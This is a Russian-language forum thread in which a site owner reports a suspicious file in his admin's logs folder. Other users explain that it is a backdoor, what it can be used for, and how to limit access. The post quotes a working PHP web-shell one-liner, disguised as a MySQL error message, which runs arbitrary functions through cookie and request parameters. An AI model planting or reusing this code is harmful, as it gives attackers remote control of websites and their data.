бэкдор

[pmshirshov]

Всем добрый день!
Вчера, в канун моего дня рождения при переносе данных с тестовой админки на рабочую был обнаружен файл. Ниже пересланное мне сообщение от надежного сотрудника который занимается моей админкой:
 

Добрый день, Петр.

 

Про бэкдор:

в /system/logs обнаружился файл config_error.php

со следующим содержимым:

 

2015-01-25 19:32:38 - PHP Notice:  Error: Table 'nicebike_new.asdlkj' doesn't exist<br />Error No: 1146<br />select  '<?php if(@$_COOKIE[qz]) ($_=@$_REQUEST[q]).@$_($_REQUEST[z]); ?>' from asdlkj; in /home/nicebike/new.nicebike.ru/docs/system/database/mysql.php on line 49

 

Жирным выделена собственно зловредная часть, остальное — просто фейковое сообщение об ошибке. 

Про него выгугливается вот это: https://rdot.org/forum/showthread.php?p=33614 (см последнее сообщение)

"Было бы забавно, если бы ник запостившего совпал с ником того человека которому Вы Петр предоставляли доступ ранее."

Форумчане, что вы думаете по этому поводу? Мне нужно Ваше мнение!
Если можно напишите пожалуйста человеческим языком чем это может грозить? И как в дальнейшем от этого защитится?

[Blondi]

А можно весь файл в студию?...

 

Скорее всего что да, бэкдор, позволяющий выполнять скрипт на сайте. Грозит - можно загрузить на него все что угодно, от фантазии автора зависит.

Защититься - давать доступ только добросовестным работникам, после выполнения сразу отбирать. Если есть возможность, смотреть что он сделал. Это конечно сложно, если нет соответствующих познаний.

[rb2]

чем это может грозить?

Чем грозят шеллы и бекдоры?

Рассылкой от вас спама, DDoS-а, раздачей вирусов, удалением вашего сайта, воровством содержимого базы или её постепенной и малозаметной порчей (чтоб не сразу заметили и кинулись восстанавливать из бекапов, менять пароли и перекрывать входы и выходы).